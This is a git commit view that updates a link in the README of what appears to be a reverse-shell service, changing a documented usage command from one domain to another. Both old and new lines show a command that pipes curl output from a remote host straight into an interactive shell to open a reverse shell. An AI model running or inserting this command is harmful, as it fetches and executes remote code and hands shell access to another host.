Browse Source

Fix old link

pull/15/merge
Luke Childs 4 years ago
parent
commit
a37aa9d90d
  1. 2
      README.md

2
README.md

@ -76,7 +76,7 @@ The following command will run the reverse shell in a background process and exi
Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session. Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
```shell ```shell
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
``` ```
## License ## License

Loading…
Cancel
Save